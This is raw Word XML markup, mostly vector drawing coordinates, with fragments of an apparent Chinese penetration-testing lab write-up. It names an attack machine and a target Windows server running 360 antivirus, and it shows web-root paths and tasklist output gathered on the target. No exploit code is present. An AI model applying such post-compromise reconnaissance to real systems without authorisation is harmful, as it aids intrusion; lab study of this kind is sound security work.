,7053,2920,7057,2920,7061,2920,7066,2920,7070,2920,7074,2920,7079,2920,7083,2920,7088,2920,7093,2920,7098,2920,7103,2920,7108,2920,7113,2920,7118,2920,7124,2920,7129,2920,7135,2920,7140,2920,7146,2920,7152,2920,7158,2920,7164,2920,7170,2920,7176,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2919,7183,2919,7183,2919,7183,2919,7183,2919,7183,2919,7183,2918,7183,2918,7183,2918,7183,2917,7183,2917,7183,2917,7183,2916,7183,2916,7183,2915,7183,2915,7183,2914,7183,2914,7183,2913,7183,2913,7183,2912,7183,2911,7183,2911,7183,2910,7183,2909,7183,2908,7183,2907,7183,2907,7183,2906,7183,2905,7183,2904,7183,2903,7183,2902,7183,2900,7183,2899,7183,2898,7183,2897,7183,2895,7183,2894,7183,2893,7183,2891,7183,2890,7183,2888,7183,2887,7183,2885,7183,2883,7183,2881,7183,2880,7183,2878,7183,2876,7183,2874,7183,2872,7183,2869,7183,2867,7183,2865,7183,2863,7183,2860,7183,2858,7183,2855,7183,2853,7183,2850,7183,2848,7183,2845,7183,2842,7183,2839,7183,2836,7183,2833,7183,2830,7183,2827,7183,2823,7183,2820,7183,2817,7183,2813,7183,2810,7183,2806,7183,2802,7183,2798,7183,2794,7183,2790,7183,2786,7183,2782,7183,2778,7183,2774,7183,2769,7183,2765,7183,2760,7183,2756,7183,2751,7183,2746,7183,2741,7183,2736,7183,2731,7183,2726,7183,2720,7183,2715,7183,2709,7183,2704,7183,2698,7183,2692,7183,2686,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7183,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7182,2680,7181,2680,7181,2680,7181,2680,7181,2680,7181,2680,7180,2680,7180,2680,7180,2680,7179,2680,7179,2680,7179,2680,7178,2680,7178,2680,7177,2680,7177,2680,7176,2680,7176,2680,7175,2680,7174,2680,7174,2680,7173,2680,7172,2680,7171,2680,7171,2680,7170,2680,7169,2680,7168,2680,7167,2680,7166,2680,7165,2680,7164,2680,7163,2680,7161,2680,7160,2680,7159,2680,7157,2680,7156,2680,7155,2680,7153,2680,7152,2680,7150,2680,7148,2680,7147,2680,7145,2680,7143,2680,7141,2680,7139,2680,7137,2680,7135,2680,7133,2680,7131,2680,7128,2680,7126,2680,7124,2680,7121,2680,7119,2680,7116,2680,7114,2680,7111,2680,7108,2680,7105,2680,7102,2680,7099,2680,7096,2680,7093,2680,7090,2680,7086,2680,7083,2680,7079,2680,7076,2680,7072,2680,7069,2680,7065,2680,7061,2680,7057,2680,7053,2680,7049,2680,7044,2680,7040,2680,7036,2680,7031,2680,7027,2680,7022,2680,7017,2680,7012,2680,7007,2680,7002,2680,6997,2680,6992,2680,6987,2680,6981,2680,6976,2680,6970,2680,6964,2680,6958,2680,6952,2680,6946,2680,6940,2680,6934,2680,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:145.500pt;margin-top:345.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,6910" coordsize="250,270">
        <v:shape style="position:absolute;left:2910;top:6910;width:250;height:270" coordorigin="2910,6910" coordsize="250,270" path="m2920,6927l2920,6927,2920,6927,2920,6927,2920,6927,2920,6927,2920,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2921,6927,2922,6927,2922,6927,2922,6927,2922,6927,2922,6927,2923,6927,2923,6927,2923,6927,2924,6927,2924,6927,2924,6927,2925,6927,2925,6927,2926,6927,2926,6927,2927,6927,2927,6927,2928,6927,2928,6927,2929,6927,2930,6927,2930,6927,2931,6927,2932,6927,2933,6927,2933,6927,2934,6927,2935,6927,2936,6927,2937,6927,2938,6927,2939,6927,2941,6927,2942,6927,2943,6927,2944,6927,2945,6927,2947,6927,2948,6927,2950,6927,2951,6927,2953,6927,2954,6927,2956,6927,2958,6927,2960,6927,2961,6927,2963,6927,2965,6927,2967,6927,2969,6927,2971,6927,2974,6927,2976,6927,2978,6927,2981,6927,2983,6927,2986,6927,2988,6927,2991,6927,2993,6927,2996,6927,2999,6927,3002,6927,3005,6927,3008,6927,3011,6927,3014,6927,3018,6927,3021,6927,3024,6927,3028,6927,3031,6927,3035,6927,3039,6927,3043,6927,3047,6927,3051,6927,3055,6927,3059,6927,3063,6927,3067,6927,3072,6927,3076,6927,3081,6927,3085,6927,3090,6927,3095,6927,3100,6927,3105,6927,3110,6927,3115,6927,3121,6927,3126,6927,3132,6927,3137,6927,3143,6927,3149,6927,3155,6927,3161,6927,3161,6927,3161,6927,3161,6927,3161,6927,3161,6927,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6928,3161,6929,3161,6929,3161,6929,3161,6929,3161,6929,3161,6930,3161,6930,3161,6930,3161,6930,3161,6931,3161,6931,3161,6932,3161,6932,3161,6932,3161,6933,3161,6933,3161,6934,3161,6935,3161,6935,3161,6936,3161,6936,3161,6937,3161,6938,3161,6939,3161,6940,3161,6940,3161,6941,3161,6942,3161,6943,3161,6944,3161,6945,3161,6946,3161,6948,3161,6949,3161,6950,3161,6951,3161,6953,3161,6954,3161,6956,3161,6957,3161,6959,3161,6960,3161,6962,3161,6964,3161,6965,3161,6967,3161,6969,3161,6971,3161,6973,3161,6975,3161,6977,3161,6979,3161,6982,3161,6984,3161,6986,3161,6989,3161,6991,3161,6994,3161,6997,3161,6999,3161,7002,3161,7005,3161,7008,3161,7011,3161,7014,3161,7017,3161,7020,3161,7024,3161,7027,3161,7031,3161,7034,3161,7038,3161,7042,3161,7045,3161,7049,3161,7053,3161,7057,3161,7061,3161,7066,3161,7070,3161,7074,3161,7079,3161,7083,3161,7088,3161,7093,3161,7098,3161,7103,3161,7108,3161,7113,3161,7118,3161,7124,3161,7129,3161,7135,3161,7140,3161,7146,3161,7152,3161,7158,3161,7164,3161,7170,3161,7176,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3161,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3160,7183,3159,7183,3159,7183,3159,7183,3159,7183,3159,7183,3158,7183,3158,7183,3158,7183,3157,7183,3157,7183,3157,7183,3156,7183,3156,7183,3155,7183,3155,7183,3154,7183,3154,7183,3153,7183,3153,7183,3152,7183,3151,7183,3151,7183,3150,7183,3149,7183,3148,7183,3148,7183,3147,7183,3146,7183,3145,7183,3144,7183,3143,7183,3142,7183,3141,7183,3139,7183,3138,7183,3137,7183,3136,7183,3134,7183,3133,7183,3131,7183,3130,7183,3128,7183,3127,7183,3125,7183,3123,7183,3121,7183,3120,7183,3118,7183,3116,7183,3114,7183,3112,7183,3110,7183,3107,7183,3105,7183,3103,7183,3100,7183,3098,7183,3096,7183,3093,7183,3090,7183,3088,7183,3085,7183,3082,7183,3079,7183,3076,7183,3073,7183,3070,7183,3067,7183,3063,7183,3060,7183,3057,7183,3053,7183,3050,7183,3046,7183,3042,7183,3038,7183,3035,7183,3031,7183,3026,7183,3022,7183,3018,7183,3014,7183,3009,7183,3005,7183,3000,7183,2996,7183,2991,7183,2986,7183,2981,7183,2976,7183,2971,7183,2966,7183,2960,7183,2955,7183,2949,7183,2944,7183,2938,7183,2932,7183,2926,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7183,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7182,2920,7181,2920,7181,2920,7181,2920,7181,2920,7181,2920,7180,2920,7180,2920,7180,2920,7179,2920,7179,2920,7179,2920,7178,2920,7178,2920,7177,2920,7177,2920,7176,2920,7176,2920,7175,2920,7174,2920,7174,2920,7173,2920,7172,2920,7171,2920,7171,2920,7170,2920,7169,2920,7168,2920,7167,2920,7166,2920,7165,2920,7164,2920,7163,2920,7161,2920,7160,2920,7159,2920,7157,2920,7156,2920,7155,2920,7153,2920,7152,2920,7150,2920,7148,2920,7147,2920,7145,2920,7143,2920,7141,2920,7139,2920,7137,2920,7135,2920,7133,2920,7131,2920,7128,2920,7126,2920,7124,2920,7121,2920,7119,2920,7116,2920,7114,2920,7111,2920,7108,2920,7105,2920,7102,2920,7099,2920,7096,2920,7093,2920,7090,2920,7086,2920,7083,2920,7079,2920,7076,2920,7072,2920,7069,2920,7065,2920,7061,2920,7057,2920,7053,2920,7049,2920,7044,2920,7040,2920,7036,2920,7031,2920,7027,2920,7022,2920,7017,2920,7012,2920,7007,2920,7002,2920,6997,2920,6992,2920,6987,2920,6981,2920,6976,2920,6970,2920,6964,2920,6958,2920,6952,2920,6946,2920,6940,2920,6934,2920,692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tabs>
          <w:tab w:val="left" w:pos="4121"/>
        </w:tabs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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="6726" w:firstLine="0"/>
      </w:pP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靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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192.168.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="9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7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2008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目标机安装：36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0卫士+360杀毒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32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1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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>磁盘列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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[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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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3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635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\inetpub\wwwroot\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="21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tasklist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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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24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映像名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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PID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会话名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="119" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="226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System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Idle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Process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24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System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372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smss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236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956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csrss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324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572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csrss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364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14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452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wininit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372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508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winlogon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408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364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services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376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lsass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476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896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lsm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484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876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576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684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vmacthlp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784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676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384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764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12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716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800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29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792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848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248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900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308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940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16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184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800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spoolsv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548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15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568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1052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228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1076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808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1144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2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576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564.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,11280">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:11280" coordorigin="10402,0" coordsize="0,11280" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,11,10402,14,10402,18,10402,22,10402,27,10402,32,10402,39,10402,45,10402,53,10402,61,10402,71,10402,81,10402,92,10402,104,10402,117,10402,131,10402,146,10402,163,10402,180,10402,199,10402,219,10402,240,10402,263,10402,287,10402,312,10402,339,10402,367,10402,397,10402,428,10402,461,10402,495,10402,532,10402,570,10402,609,10402,651,10402,694,10402,740,10402,787,10402,836,10402,887,10402,941,10402,996,10402,1054,10402,1113,10402,1175,10402,1239,10402,1306,10402,1374,10402,1445,10402,1519,10402,1595,10402,1673,10402,1754,10402,1838,10402,1924,10402,2013,10402,2104,10402,2198,10402,2295,10402,2395,10402,2498,10402,2604,10402,2712,10402,2823,10402,2938,10402,3055,10402,3176,10402,3300,10402,3427,10402,3557,10402,3690,10402,3827,10402,3967,10402,4110,10402,4257,10402,4407,10402,4561,10402,4718,10402,4879,10402,5044,10402,5212,10402,5384,10402,5559,10402,5739,10402,5922,10402,6109,10402,6300,10402,6495,10402,6693,10402,6896,10402,7103,10402,7314,10402,7529,10402,7748,10402,7972,10402,8200,10402,8432,10402,8668,10402,8909,10402,9154,10402,9404,10402,9658,10402,9917,10402,10180,10402,10448,10402,10720,10402,10998,10402,11280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1000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1000l1517,1000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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:8990;height:370" coordorigin="1490,2090" coordsize="8990,37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3,10484,2114,10484,2114,10484,2115,10484,2115,10484,2116,10484,2116,10484,2117,10484,2118,10484,2118,10484,2119,10484,2120,10484,2121,10484,2122,10484,2123,10484,2124,10484,2125,10484,2126,10484,2127,10484,2128,10484,2130,10484,2131,10484,2132,10484,2134,10484,2135,10484,2137,10484,2138,10484,2140,10484,2142,10484,2144,10484,2146,10484,2148,10484,2150,10484,2152,10484,2154,10484,2156,10484,2159,10484,2161,10484,2164,10484,2166,10484,2169,10484,2172,10484,2174,10484,2177,10484,2180,10484,2183,10484,2187,10484,2190,10484,2193,10484,2197,10484,2200,10484,2204,10484,2208,10484,2211,10484,2215,10484,2219,10484,2224,10484,2228,10484,2232,10484,2237,10484,2241,10484,2246,10484,2251,10484,2256,10484,2261,10484,2266,10484,2271,10484,2276,10484,2282,10484,2288,10484,2293,10484,2299,10484,2305,10484,2311,10484,2317,10484,2324,10484,2330,10484,2337,10484,2344,10484,2350,10484,2357,10484,2365,10484,2372,10484,2379,10484,2387,10484,2395,10484,2402,10484,2410,10484,2418,10484,2427,10484,2435,10484,2444,10484,2452,10484,2461,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10483,2470,10482,2470,10482,2470,10480,2470,10479,2470,10477,2470,10475,2470,10473,2470,10470,2470,10466,2470,10462,2470,10458,2470,10453,2470,10448,2470,10442,2470,10435,2470,10428,2470,10419,2470,10411,2470,10401,2470,10391,2470,10379,2470,10367,2470,10354,2470,10340,2470,10326,2470,10310,2470,10293,2470,10275,2470,10256,2470,10236,2470,10215,2470,10192,2470,10168,2470,10143,2470,10117,2470,10090,2470,10061,2470,10031,2470,9999,2470,9966,2470,9931,2470,9895,2470,9858,2470,9819,2470,9778,2470,9735,2470,9691,2470,9646,2470,9598,2470,9549,2470,9498,2470,9445,2470,9391,2470,9334,2470,9275,2470,9215,2470,9153,2470,9088,2470,9022,2470,8953,2470,8883,2470,8810,2470,8735,2470,8658,2470,8578,2470,8497,2470,8413,2470,8326,2470,8238,2470,8146,2470,8053,2470,7957,2470,7859,2470,7758,2470,7654,2470,7548,2470,7439,2470,7328,2470,7214,2470,7097,2470,6977,2470,6855,2470,6730,2470,6602,2470,6471,2470,6337,2470,6201,2470,6061,2470,5918,2470,5773,2470,5624,2470,5472,2470,5317,2470,5159,2470,4997,2470,4833,2470,4665,2470,4494,2470,4319,2470,4141,2470,3960,2470,3776,2470,3587,2470,3396,2470,3201,2470,3002,2470,2800,2470,2594,2470,2385,2470,2172,2470,1955,2470,1734,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2469,1510,2469,1510,2469,1510,2469,1510,2469,1510,2468,1510,2468,1510,2468,1510,2467,1510,2467,1510,2466,1510,2466,1510,2466,1510,2465,1510,2464,1510,2464,1510,2463,1510,2463,1510,2462,1510,2461,1510,2460,1510,2459,1510,2459,1510,2458,1510,2457,1510,2456,1510,2454,1510,2453,1510,2452,1510,2451,1510,2449,1510,2448,1510,2447,1510,2445,1510,2444,1510,2442,1510,2440,1510,2438,1510,2437,1510,2435,1510,2433,1510,2431,1510,2429,1510,2426,1510,2424,1510,2422,1510,2419,1510,2417,1510,2414,1510,2412,1510,2409,1510,2406,1510,2403,1510,2400,1510,2397,1510,2394,1510,2390,1510,2387,1510,2384,1510,2380,1510,2376,1510,2373,1510,2369,1510,2365,1510,2361,1510,2357,1510,2352,1510,2348,1510,2344,1510,2339,1510,2334,1510,2329,1510,2325,1510,2320,1510,2314,1510,2309,1510,2304,1510,2298,1510,2293,1510,2287,1510,2281,1510,2275,1510,2269,1510,2263,1510,2257,1510,2250,1510,2243,1510,2237,1510,2230,1510,2223,1510,2216,1510,2208,1510,2201,1510,2193,1510,2186,1510,2178,1510,2170,1510,2162,1510,2154,1510,2145,1510,2137,1510,2128,1510,2119,1510,2110e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:104.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2090" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2090;width:30;height:370" coordorigin="1490,2090" coordsize="30,370" path="m1517,2110l1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2110,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2111,1517,2112,1517,2112,1517,2112,1517,2112,1517,2113,1517,2113,1517,2113,1517,2114,1517,2114,1517,2115,1517,2115,1517,2116,1517,2116,1517,2117,1517,2118,1517,2118,1517,2119,1517,2120,1517,2121,1517,2122,1517,2123,1517,2124,1517,2125,1517,2126,1517,2127,1517,2128,1517,2130,1517,2131,1517,2132,1517,2134,1517,2135,1517,2137,1517,2138,1517,2140,1517,2142,1517,2144,1517,2146,1517,2148,1517,2150,1517,2152,1517,2154,1517,2156,1517,2159,1517,2161,1517,2164,1517,2166,1517,2169,1517,2172,1517,2174,1517,2177,1517,2180,1517,2183,1517,2187,1517,2190,1517,2193,1517,2197,1517,2200,1517,2204,1517,2208,1517,2211,1517,2215,1517,2219,1517,2224,1517,2228,1517,2232,1517,2237,1517,2241,1517,2246,1517,2251,1517,2256,1517,2261,1517,2266,1517,2271,1517,2276,1517,2282,1517,2288,1517,2293,1517,2299,1517,2305,1517,2311,1517,2317,1517,2324,1517,2330,1517,2337,1517,2344,1517,2350,1517,2357,1517,2365,1517,2372,1517,2379,1517,2387,1517,2395,1517,2402,1517,2410,1517,2418,1517,2427,1517,2435,1517,2444,1517,2452,1517,2461,1517,2470e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:122.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2450" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2450;width:8990;height:390" coordorigin="1490,2450" coordsize="8990,390" path="m1510,2470l1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1510,2470,1511,2470,1512,2470,1512,2470,1514,2470,1515,2470,1517,2470,1519,2470,1521,2470,1524,2470,1528,2470,1532,2470,1536,2470,1541,2470,1546,2470,1552,2470,1559,2470,1566,2470,1575,2470,1583,2470,1593,2470,1603,2470,1615,2470,1627,2470,1640,2470,1654,2470,1668,2470,1684,2470,1701,2470,1719,2470,1738,2470,1758,2470,1780,2470,1802,2470,1826,2470,1851,2470,1877,2470,1904,2470,1933,2470,1963,2470,1995,2470,2028,2470,2063,2470,2099,2470,2136,2470,2175,2470,2216,2470,2259,2470,2303,2470,2348,2470,2396,2470,2445,2470,2496,2470,2549,2470,2604,2470,2660,2470,2719,2470,2779,2470,2841,2470,2906,2470,2972,2470,3041,2470,3112,2470,3184,2470,3259,2470,3336,2470,3416,2470,3498,2470,3582,2470,3668,2470,3757,2470,3848,2470,3941,2470,4037,2470,4136,2470,4236,2470,4340,2470,4446,2470,4555,2470,4666,2470,4780,2470,4897,2470,5017,2470,5139,2470,5264,2470,5392,2470,5523,2470,5657,2470,5793,2470,5933,2470,6076,2470,6222,2470,6370,2470,6522,2470,6677,2470,6835,2470,6997,2470,7161,2470,7329,2470,7500,2470,7675,2470,7853,2470,8034,2470,8219,2470,8407,2470,8598,2470,8793,2470,8992,2470,9194,2470,9400,2470,9609,2470,9823,2470,10039,2470,10260,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2470,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2471,10484,2472,10484,2472,10484,2472,10484,2472,10484,2473,10484,2473,10484,2473,10484,2474,10484,2474,10484,2475,10484,2475,10484,2476,10484,2476,10484,2477,10484,2478,10484,2478,10484,2479,10484,2480,10484,2481,10484,2482,10484,2482,10484,2483,10484,2484,10484,2486,10484,2487,10484,2488,10484,2489,10484,2491,10484,2492,10484,2493,10484,2495,10484,2496,10484,2498,10484,2500,10484,2502,10484,2503,10484,2505,10484,2507,10484,2509,10484,2511,10484,2514,10484,2516,10484,2518,10484,2521,10484,2523,10484,2526,10484,2529,10484,2531,10484,2534,10484,2537,10484,2540,10484,2543,10484,2547,10484,2550,10484,2553,10484,2557,10484,2560,10484,2564,10484,2568,10484,2572,10484,2576,10484,2580,10484,2584,10484,2589,10484,2593,10484,2598,10484,2602,10484,2607,10484,2612,10484,2617,10484,2622,10484,2627,10484,2633,10484,2638,10484,2644,10484,2649,10484,2655,10484,2661,10484,2667,10484,2673,10484,2680,10484,2686,10484,2693,10484,2700,10484,2707,10484,2714,10484,2721,10484,2728,10484,2735,10484,2743,10484,2751,10484,2759,10484,2767,10484,2775,10484,2783,10484,2791,10484,2800,10484,2809,10484,2818,10484,2827,10484,2836,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10484,2845,10483,2845,10482,2845,10482,2845,10480,2845,10479,2845,10477,2845,10475,2845,10473,2845,10470,2845,10466,2845,10462,2845,10458,2845,10453,2845,10448,2845,10442,2845,10435,2845,10428,2845,10419,2845,10411,2845,10401,2845,10391,2845,10379,2845,10367,2845,10354,2845,10340,2845,10326,2845,10310,2845,10293,2845,10275,2845,10256,2845,10236,2845,10215,2845,10192,2845,10168,2845,10143,2845,10117,2845,10090,2845,10061,2845,10031,2845,9999,2845,9966,2845,9931,2845,9895,2845,9858,2845,9819,2845,9778,2845,9735,2845,9691,2845,9646,2845,9598,2845,9549,2845,9498,2845,9445,2845,9391,2845,9334,2845,9275,2845,9215,2845,9153,2845,9088,2845,9022,2845,8953,2845,8883,2845,8810,2845,8735,2845,8658,2845,8578,2845,8497,2845,8413,2845,8326,2845,8238,2845,8146,2845,8053,2845,7957,2845,7859,2845,7758,2845,7654,2845,7548,2845,7439,2845,7328,2845,7214,2845,7097,2845,6977,2845,6855,2845,6730,2845,6602,2845,6471,2845,6337,2845,6201,2845,6061,2845,5918,2845,5773,2845,5624,2845,5472,2845,5317,2845,5159,2845,4997,2845,4833,2845,4665,2845,4494,2845,4319,2845,4141,2845,3960,2845,3776,2845,3587,2845,3396,2845,3201,2845,3002,2845,2800,2845,2594,2845,2385,2845,2172,2845,1955,2845,1734,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2845,1510,2844,1510,2844,1510,2844,1510,2844,1510,2843,1510,2843,1510,2843,1510,2842,1510,2842,1510,2842,1510,2841,1510,2841,1510,2840,1510,2839,1510,2839,1510,2838,1510,2837,1510,2837,1510,2836,1510,2835,1510,2834,1510,2833,1510,2832,1510,2831,1510,2830,1510,2829,1510,2828,1510,2826,1510,2825,1510,2824,1510,2822,1510,2821,1510,2819,1510,2818,1510,2816,1510,2814,1510,2812,1510,2810,1510,2808,1510,2806,1510,2804,1510,2802,1510,2800,1510,2797,1510,2795,1510,2792,1510,2790,1510,2787,1510,2784,1510,2781,1510,2778,1510,2775,1510,2772,1510,2769,1510,2766,1510,2762,1510,2759,1510,2755,1510,2752,1510,2748,1510,2744,1510,2740,1510,2736,1510,2731,1510,2727,1510,2723,1510,2718,1510,2713,1510,2709,1510,2704,1510,2699,1510,2694,1510,2688,1510,2683,1510,2678,1510,2672,1510,2666,1510,2661,1510,2655,1510,2648,1510,2642,1510,2636,1510,2629,1510,2623,1510,2616,1510,2609,1510,2602,1510,2595,1510,2588,1510,2580,1510,2573,1510,2565,1510,2557,1510,2549,1510,2541,1510,2533,1510,2524,1510,2516,1510,2507,1510,2498,1510,2489,1510,2480,1510,2470e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:122.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2450" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:2450;width:30;height:390" coordorigin="1490,2450" coordsize="30,390" path="m1517,2470l1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2470,1517,2471,1517,2471,1517,2471,1517,2471,1517,2471,1517,2471,1517,2471,1517,2472,1517,2472,1517,2472,1517,2472,1517,2473,1517,2473,1517,2473,1517,2474,1517,2474,1517,2475,1517,2475,1517,2476,1517,2476,1517,2477,1517,2478,1517,2478,1517,2479,1517,2480,1517,2481,1517,2482,1517,2482,1517,2483,1517,2484,1517,2486,1517,2487,1517,2488,1517,2489,1517,2491,1517,2492,1517,2493,1517,2495,1517,2496,1517,2498,1517,2500,1517,2502,1517,2503,1517,2505,1517,2507,1517,2509,1517,2511,1517,2514,1517,2516,1517,2518,1517,2521,1517,2523,1517,2526,1517,2529,1517,2531,1517,2534,1517,2537,1517,2540,1517,2543,1517,2547,1517,2550,1517,2553,1517,2557,1517,2560,1517,2564,1517,2568,1517,2572,1517,2576,1517,2580,1517,2584,1517,2589,1517,2593,1517,2598,1517,2602,1517,2607,1517,2612,1517,2617,1517,2622,1517,2627,1517,2633,1517,2638,1517,2644,1517,2649,1517,2655,1517,2661,1517,2667,1517,2673,1517,2680,1517,2686,1517,2693,1517,2700,1517,2707,1517,2714,1517,2721,1517,2728,1517,2735,1517,2743,1517,2751,1517,2759,1517,2767,1517,2775,1517,2783,1517,2791,1517,2800,1517,2809,1517,2818,1517,2827,1517,2836,1517,2845e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:141.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2830" coordsize="8990,370">
